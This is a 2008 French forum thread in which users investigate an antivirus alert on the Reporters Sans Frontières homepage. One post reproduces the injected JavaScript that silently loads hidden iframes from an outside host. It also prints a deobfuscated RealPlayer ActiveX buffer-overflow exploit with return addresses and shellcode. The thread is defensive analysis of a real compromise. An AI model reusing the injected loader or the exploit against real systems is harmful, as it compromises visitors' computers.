[Plan du site] Vous êtes ici --- > Le Site du Zéro > Les forums > Communauté des zéros > Discussions générales > Reporter Sans Frontière Hacké ? > Lecture du sujet

Reporter Sans Frontière Hacké ?

BitDefender se déclenche sur la page d'accueil de RSF

Vous devez être inscrit pour pouvoir poster des messages

Résolu Le problème de ce sujet a été résolu

Page : 1 2 3 4 5 6 7 Suivante

Auteur

Message

1 visiteur sur ce sujet (1 anonyme)

Page : 1 2 3 4 5 6 7 Suivante

neirda33

# Posté le 21/04/2008 à 12:06:16

Flou artistique ?

Groupe : Membres

Salut à tous les zérOs !

Je suis allé faire un tour sur le site de Reporters Sans Frontières, et, sur la page d'accueil, BitDefender se déclenche [voir ICI].
J'ai suivi le lien donné par BitDefender ([Evitez de le suivre] http://amrc.com.tw/1/2.jpg) concernant l'image "virusée" (ce mot n'existe pas, mais il veut dire "L'image qui contient un "virus") et me il me bloque l'accès à la page.
Le site appartient à une université asiatique [ICI].

J'aurais voulut savoir si le site de RSF à été "hacké".

Merci

Bonne Enquête !

anonyme

# Posté le 21/04/2008 à 12:09:50

Groupe :

Je n'ai aucune alerte en allant dessus.

XeloS

# Posté le 21/04/2008 à 12:15:14

D-generation-X

Groupe : Bannis

Salut,

Effectivement antivir se déclenche o_O

.

EDIT: Je viens d'y refaire un tour et rien ... Bizarre Bizarre ...

Édité le 21/04/2008 à 12:16:56 par XeloS

neirda33

# Posté le 21/04/2008 à 12:16:14

Flou artistique ?

Groupe : Membres

Ah ! Je ne suis pas dingue

anonyme

# Posté le 21/04/2008 à 12:17:58

Groupe :

Je suis allé là : -http://amrc.com.tw/1/2.jpg

Ceci n'est pas une image mais un script malveillant

Et rien de particulier. Mais c'est vrai que c'est bizarre.

XeloS

# Posté le 21/04/2008 à 12:18:44

D-generation-X

Groupe : Bannis

Citation : clems942

Je suis allé là : http://amrc.com.tw/1/2.jpg
Et rien de particulier. Mais c'est vrai que c'est bizarre.

Idem, il n'y a rien ..

Xinox

# Posté le 21/04/2008 à 12:20:11

Révolutionnaire
Groupe : Membres

La Chine a une armée de hackers, et ça m'étonnerait pas qu'ils soient intéressés par rsf.

XeloS

# Posté le 21/04/2008 à 12:20:58

D-generation-X

Groupe : Bannis

Après le coup de la flamme olympique ...

neirda33

# Posté le 21/04/2008 à 12:23:23

Flou artistique ?

Groupe : Membres

Voici ce qui se passe quand je vais sur http://amrc.com.tw/1/2.jpg

ICI

kumae

# Posté le 21/04/2008 à 12:27:02

Tales of powa !

Groupe : Membres

Waw je pencherai pour l'hypothèse de l'attaque des hackers chinois, enfin, c'est probable

Powa Sonic XNA 2 (en cours de programmation)
Etat du jeu:

Codage du moteur de jeu:
|||||||||||||||||||| (il manque les rotations et les loopings =P)
Scénario du jeu:
||||||||||||||||||||
Graphismes (création des décors et animation du perso):
||||||||||||||||||||
Musiques (Jun Senoue c'est le meilleur xD) et sons (bruitages):
||||||||||||||||||||

anonyme

# Posté le 21/04/2008 à 12:29:27

Groupe :

Citation : neirda33

Voici ce qui se passe quand je vais sur http://amrc.com.tw/1/2.jpg

ICI

Moi j'ai pas d'alerte (Avast

). Par contre j'ai une page avec marqué "http://amrc.com.tw/1/2.jpg".

kumae

# Posté le 21/04/2008 à 12:32:53

Tales of powa !

Groupe : Membres

Ouais comme clems942
Peut-être que c'est bitDefender qui déconne---ou peut-être pas

anonyme

# Posté le 21/04/2008 à 12:38:34

Groupe :

A mon avis Bitdefender n'invente pas la présence de cette "image", qui comme par hasard vient d'un site chinois (ou asiatique).

dimdam

# Posté le 21/04/2008 à 13:05:37

Groupe : Membres

En tout le cas le code source de la page est louche.

kumae

# Posté le 21/04/2008 à 13:09:59

Tales of powa !

Groupe : Membres

Mais y'a pas de code source, c'est une image le lien donné hein...
J'espère que t'as pas regardé le code source de l'image

anonyme

# Posté le 21/04/2008 à 13:12:30

Groupe :

Non c'est pas une image.

vodkanux

# Posté le 21/04/2008 à 13:15:15

Groupe : Membres

J'ai une information sur ce Malware :

Description Exploit.GDI.EMF.A

Faites du bien a vos orreilles

et mon Blog !

anonyme

# Posté le 21/04/2008 à 13:16:38

Groupe :

* Fait un scan *

1337833K

# Posté le 21/04/2008 à 13:22:12

fgsfds
Groupe : Membres

Sans vouloir troller, on a encore une fois la preuve que Avast! est à la traine. :-°

Sinon, je penche aussi vers l'hypothèse des `pirates chinois´.

Big Brother is watching you.
The chocolate is a lie !
Vous pouvez faire un geste gratuit pour changer le monde.

Libérez quelqu'un et quelqu'un-d'autre !

anonyme

# Posté le 21/04/2008 à 13:28:56

Groupe :

J'ai envoyé un mail à rsf.

entwanne

# Posté le 21/04/2008 à 13:30:21

fan de ZoZor

Groupe : Membres

regardez tout de même ce que l'on trouve dans la source de cette page : http://amrc.com.tw/1/2.jpg
Citation

HTTP://amrc.com.tw/1/2.gif�ina.exe

Jabber :

Dernier article du blog (cliquer pour accéder) :

dimdam

# Posté le 21/04/2008 à 13:48:44

Groupe : Membres

Ni antivir ni l'UAC n'ont vu quelque chose.
Il fait quoi en gros ce virus ?
*a peur*

anonyme

# Posté le 21/04/2008 à 13:50:06

Groupe :

Il permet à un tiers de prendre le contrôle de ton PC, et il installe d'autres malwares, d'après le lien qui a été donné plus haut.

vodkanux

# Posté le 21/04/2008 à 13:52:47

Groupe : Membres

Ouai, tu as bien fait d'envoyer l'email clems942, mais j'aimerais avoir plus d'informations sur ce malware

J'ai réussi a avoir que trois lien sur ce malware si vous avez plus d'informations la dessus tenez nous au courant

Faites du bien a vos orreilles

et mon Blog !

Neoterranos

# Posté le 21/04/2008 à 13:57:16

Lost in clouds of ecstasy.
Avatar

Groupe : Membres

Peut-être que Bit Defender est aussi pour les droits de l'homme...

Bref, je doute que ce soit un hack, RSF s'en serait rendu compte.

Perdu sur le SdZ ? Clique ici ! Perdu sur CCDS ? Clique ici !

neirda33

# Posté le 21/04/2008 à 13:58:13

Flou artistique ?

Groupe : Membres

J'avais déjà envoyé un mail à RSF, penses-tu !

Avec les événements récents, ils n'ont pas encore eu le temps de répondre...

Je suis content de voir je n'ais pas dépensé 70€ pour rien (BitDefender Internet Sécurity. Postes: illimités. Durée de license: 2ans.)

anonyme

# Posté le 21/04/2008 à 13:59:13

Groupe :

Citation : Neoterranos

Bref, je doute que ce soit un hack, RSF s'en serait rendu compte.

S'en seraient rendus compte comment, à part en ayant Bitdefender et en actualisant la page d'accueil toutes les minutes depuis hier ? Et tu crois que cette alerte vient d'où, si c'est pas un hack ?

neirda33

# Posté le 21/04/2008 à 14:04:02

Flou artistique ?

Groupe : Membres

Ça le fait qu'une fois par session (a chaque fois que j'efface mes traces FF et que je retourne sur le site, ça le refait)

Mais oui, apparemment, si ça le fait que sur BitDefender, peut-être ne sont ils pas encore au courant. Comme quoi, il est vachement bien développé, ce pack de sécurité.

Ça me l'a fait pour la 1ere fois samedi 19 avril 2008, pour info. Quel scoop, j'appelle la presse !

vodkanux

# Posté le 21/04/2008 à 14:09:19

Groupe : Membres

Voila la description en français de la chose :

En résumé c'est sa sa éxécute un code malveillant quand le navigateur affiche l'image.

Deux vulnérabilités ont été identifiées dans Microsoft Windows, elles pourraient être exploitées par des attaquants distants afin de causer un déni de service ou compromettre un système vulnérable. Ces failles résultent de débordements de mémoire présents au niveau de l'interface GDI qui ne gère pas correctement des fichiers Windows Metafile (WMF) ou Enhanced Metafile (EMF) malformés, ce qui pourrait être exploité par des attaquants afin d'altérer le fonctionnement d'un système vulnérable ou afin d'exécuter un code arbitraire en incitant un utilisateur à visiter une page web spécialement conçue.

Source FrSirt.

Faites du bien a vos orreilles

et mon Blog !

Bilbax

# Posté le 21/04/2008 à 14:16:37

www.bilbax.eu

Groupe : Membres

Regardez ce code louche trouvé à la fin du fichier pour hasher en md5 :

Code : JavaScript

//alert(document.cookie);
var expdate = new Date((new Date()).getTime() + (1*60*60*1000)); 
var expdates = new Date((new Date()).getTime() + (2*60*60*1000));
var expdatess = new Date((new Date()).getTime() + (3*60*60*1000));
if (document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "twocookie")==-1&&document.cookie.indexOf( "threecookie")==-1) 
{
	document.write('<img src=http://amrc.com.tw/1/2.jpg width=0 height=0></iframe>');
	document.write('<img src=http://amrc.com.tw/1/22.html width=0 height=0></iframe>');
	document.cookie= "onecookie=1;expires= " + expdate.toGMTString() + ";path=/; ";
	document.cookie= "twocookie=1;expires= " + expdates.toGMTString() + ";path=/; ";
}
else if (getCookie("twocookie")==1&&document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "threecookie")==-1)
{
	document.write('<iframe src=http://amrc.com.tw/1/2.htm width=0 height=0></iframe>');
	document.cookie= "threecookie=1;expires= " + expdatess.toGMTString() + ";path=/; ";}
else if (getCookie("threecookie")==1&&document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "twocookie")==-1)
{
document.write('<iframe src=http://amrc.com.tw/1/2.html width=0 height=0></iframe>');
document.cookie= "threecookie=2;expires= " + expdatess.toGMTString() + ";path=/; ";
}
else
{
document.write("");
}

Ce n'est pas sa place, il a été rajouté ! o_O

EDIT : Ca mène vers une page 22.html qui elle contient un code JS "crypté", dont on ne peut pas voir la source, par contre FireBug a réussi à le voir :

Secret (cliquez pour afficher)

Code : JavaScript

function RealExploit()
{
	var user = navigator.userAgent.toLowerCase();
	
	if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
		return;
	if(user.indexOf("nt 5.")==-1)
		return;
	
	VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
	
	try
	{
		Real = new ActiveXObject(VulObject);
	}
	catch(error)
	{
		return;
	}
	
	RealVersion = Real.PlayerProperty("PRODUCTVERSION");
	Padding = "";
	JmpOver = unescape("%75%06%74%04");
	for(i = 0; i < 32 * 148; i++)
		Padding += "S";

	if(RealVersion.indexOf("6.0.14.") == -1)
	{
		if(navigator.userLanguage.toLowerCase() == "zh-cn")
			ret = unescape("%7f%a5%60");
		else if(navigator.userLanguage.toLowerCase() == "en-us")
			ret = unescape("%4f%71%a4%60");
		else
			return;
	}
	else if(RealVersion == "6.0.14.544")
		ret = unescape("%63%11%08%60");
	else if(RealVersion == "6.0.14.550")
		ret = unescape("%63%11%04%60");
	else if(RealVersion == "6.0.14.552")
		ret = unescape("%79%31%01%60");
	else if(RealVersion == "6.0.14.543")
		ret = unescape("%79%31%09%60");
	else if(RealVersion == "6.0.14.536")
		ret = unescape("%51%11%70%63");
	else
		return;


	if(RealVersion.indexOf("6.0.10.") != -1)
	{
		for(i = 0; i < 4; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.11.") != -1)
	{
		for(i = 0; i < 6; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.12.") != -1)
	{
		for(i = 0; i < 9; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.14.") != -1)
	{
		for(i = 0; i < 10; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}

	AdjESP = "LLLL\\XXXXXLD";
	Shell = "TYXXXXfiAqcYfPAAeiAoHFXZPiAkjbrIPiAgVbaaPiAckwzOPLiAsloUWPiAZczabPiAVqKpAPiARCpDXPQlaaTbaaaLtUAAAACFiaaPoHHmDahivabowabHknEwPCmfhwdgTwPcJrOBoFafMgrFsrnFSfoVmRnWtWGrOcarOSRrNFGfIffppppPpPpNBoYfXfofNPPPpFhGEgBvLFmetOoafXKNxnhBnPpPpPPHCnLRPXKmlVJrpucoOefPDlgptpSUlVqRNVeLGddpcPDGxfuppPPCslPepuPeCEWEpOOUfQphkMLupESOouVpXOoUFplEQuFhkGECLXkwTRnwxpsOEefHKgVRpPSOecClydYdqzMPsleCsMkpokNQpCJMfgtPxLALKpMPcmZTPNKoqcKaOGeNWENXkUNBTPCMmfVXKPLdKxkuNqLPSmMXkPDhKPclejKEneyLsNXEGOOOOOohnTNPnNLlaWiNuKxYHonXZpNgnMhnRgscVQjbOgpFxWdwTgPSjrOBOfAVmgrvSrNvCVOvMRNWtGgboCArOSabnvWvIFvPp";
	PayLoad = Padding + AdjESP + Shell;
	while(PayLoad.length < 0x8000)
		PayLoad += "YuanGe";
	Real.Import("c:\\Program Files\\NetMeeting\\blip.wav", PayLoad,"", 0, 0);
}
RealExploit();

Édité le 21/04/2008 à 14:25:43 par Bilbax

Retour au forum "Discussions générales" ou à la liste des forums

Vous devez être inscrit pour pouvoir poster des messages

Tutoriels

Communauté

Mon compte

Recherche

Livre d'or

Publicité

Reporter Sans Frontière Hacké ?

BitDefender se déclenche sur la page d'accueil de RSF